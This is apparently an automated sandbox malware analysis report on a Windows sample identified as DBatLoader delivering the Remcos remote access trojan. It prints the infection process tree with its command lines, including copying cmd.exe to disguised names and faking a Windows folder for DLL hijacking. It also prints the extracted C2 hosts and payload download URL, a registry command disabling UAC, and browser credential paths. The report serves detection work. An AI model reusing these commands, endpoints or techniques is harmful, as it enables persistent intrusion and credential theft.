
Windows Analysis Report
AWkpqJMxci.exe

Overview

General Information

Sample name: AWkpqJMxci.exe (renamed because the original name is a hash value)
Original sample name: 096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62.exe
Analysis ID: 1562870
MD5: b4e2055b4877dcfcbf9a366106b15591
SHA1: 459f7b89e83d5be3581029dca3bb32d4c97d8156
SHA256: 096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62
Tags: doganalecmdexeuser-JAMESWT_MHT

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: DLL Search Order Hijacking Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • AWkpqJMxci.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\AWkpqJMxci.exe" MD5: B4E2055B4877DCFCBF9A366106B15591)
    • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 2128 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 2056 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 5960 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 1376 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 1352 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 5304 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 4228 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 6676 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5164 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 4180 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\AWkpqJMxci.exe /d C:\\Users\\Public\\Libraries\\Bzaszylr.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 7124 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Bzaszylr.PIF (PID: 6680 cmdline: "C:\Users\Public\Libraries\Bzaszylr.PIF" MD5: B4E2055B4877DCFCBF9A366106B15591)
    • SndVol.exe (PID: 5764 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Bzaszylr.PIF (PID: 6576 cmdline: "C:\Users\Public\Libraries\Bzaszylr.PIF" MD5: B4E2055B4877DCFCBF9A366106B15591)
    • colorcpl.exe (PID: 4476 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0"]}
{"Host:Port:Password": ["ogcmaw.duckdns.org:2404:0", "emberluck.duckdns.org:2500:0"], "Assigned name": "Ember Luck", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SKG82E", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source | Rule | Description | Author | Strings
00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
Source | Rule | Description | Author | Strings
8.2.colorcpl.exe.670191b.2.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
8.2.colorcpl.exe.670191b.2.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
8.2.colorcpl.exe.670191b.2.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
8.2.colorcpl.exe.670191b.2.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6aab8:$a1: Remcos restarted by watchdog!
  • 0x6b030:$a3: %02i:%02i:%02i:%03i
8.2.colorcpl.exe.670191b.2.raw.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x64b7c:$str_b2: Executing file:
  • 0x65bfc:$str_b3: GetDirectListeningPort
  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65728:$str_b7: \update.vbs
  • 0x64ba4:$str_b9: Downloaded file:
  • 0x64b90:$str_b10: Downloading file:
  • 0x64c34:$str_b12: Failed to upload file:
  • 0x65bc4:$str_b13: StartForward
  • 0x65be4:$str_b14: StopForward
  • 0x65680:$str_b15: fso.DeleteFile "
  • 0x65614:$str_b16: On Error Resume Next
  • 0x656b0:$str_b17: fso.DeleteFolder "
  • 0x64c24:$str_b18: Uploaded file:
  • 0x64be4:$str_b19: Unable to delete:
  • 0x65648:$str_b20: while fso.FileExists("
  • 0x650c1:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: File created; Author: frack113, Nasreddine Bencherchali; Data: EventID: 11, Image: C:\Users\user\Desktop\AWkpqJMxci.exe, ProcessId: 6608, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1076, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 5960, ProcessName: alpha.pif
Source: Registry Key set; Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing; Data: Details: C:\Users\Public\Bzaszylr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AWkpqJMxci.exe, ProcessId: 6608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bzaszylr
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\Public\Bzaszylr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AWkpqJMxci.exe, ProcessId: 6608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bzaszylr
Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1076, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 5960, ProcessName: alpha.pif

Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: 0A 55 C7 CC 7A 15 D8 19 31 D4 C6 D2 DA DE 06 22 43 AA F3 15 99 78 D1 91 9E B9 97 A8 45 23 8F E0 6A 64 70 0B 7F 79 00 92 BA F2 E0 03 F6 4E 5B 8E 53 C3 7F 0C AD 5A 8F 79 E5 B2 82 D6 A0 CB A4 73 60 CD , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7124, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-SKG82E\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T08:24:03.271330+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 142.250.181.33 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T08:24:12.618349+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:24:15.182174+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49733 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:24:27.160184+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:24:29.405914+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:24:41.026788+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:24:43.259234+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:24:54.918541+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49744 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:24:57.172177+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:25:08.776100+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49763 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:25:11.009478+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49769 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:25:23.036101+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49800 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:25:25.636529+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49806 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:25:37.386560+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49831 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:25:39.625415+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49837 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:25:51.267856+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49862 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:25:53.502242+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49868 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:26:05.104315+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49894 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:26:07.313945+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49900 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:26:19.010690+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49927 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:26:21.204631+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49933 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:26:33.321104+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49961 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:26:35.870577+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49967 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:26:47.667527+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49994 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:26:49.949304+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50001 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:27:01.572309+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50027 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:27:03.796690+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50029 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:27:15.546500+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50030 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:27:17.753208+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50031 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:27:29.527066+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50032 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:27:31.809755+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50033 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:27:43.782138+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50034 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:27:46.398618+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50035 | 192.169.69.26 | 2500 | TCP
2024-11-26T08:27:58.104667+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50036 | 162.216.243.15 | 2404 | TCP
2024-11-26T08:28:00.316675+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50037 | 192.169.69.26 | 2500 | TCP


AV Detection

Source: AWkpqJMxci.exe; Avira: detected
Source: C:\Users\Public\Libraries\Bzaszylr.PIF; Avira: detection malicious, Label: TR/AD.Nekark.gwqnm
Source: AWkpqJMxci.exe; Malware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0"]}
Source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["ogcmaw.duckdns.org:2404:0", "emberluck.duckdns.org:2500:0"], "Assigned name": "Ember Luck", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SKG82E", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\Public\Libraries\Bzaszylr.PIF; ReversingLabs: Detection: 71%
Source: AWkpqJMxci.exe; ReversingLabs: Detection: 71%
Source: Yara match; File source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 94.5% probability
Source: C:\Users\Public\Libraries\Bzaszylr.PIF; Joe Sandbox ML: detected
Source: AWkpqJMxci.exe; Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_046938C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_046938C8
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 17_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_004338C8
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 17_2_051545E3 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_051545E3
Source: colorcpl.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

Source: Yara match; File source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR

Privilege Escalation

Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 8_2_04667538 _wcslen,CoGetObject,8_2_04667538
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 17_2_00407538 _wcslen,CoGetObject,17_2_00407538
Source: AWkpqJMxci.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb; source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb; source: AWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP; source: esentutl.exe, 00000003.00000003.1762893892.0000000000AA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000005.00000000.1769159470.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000009.00000000.1774119719.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
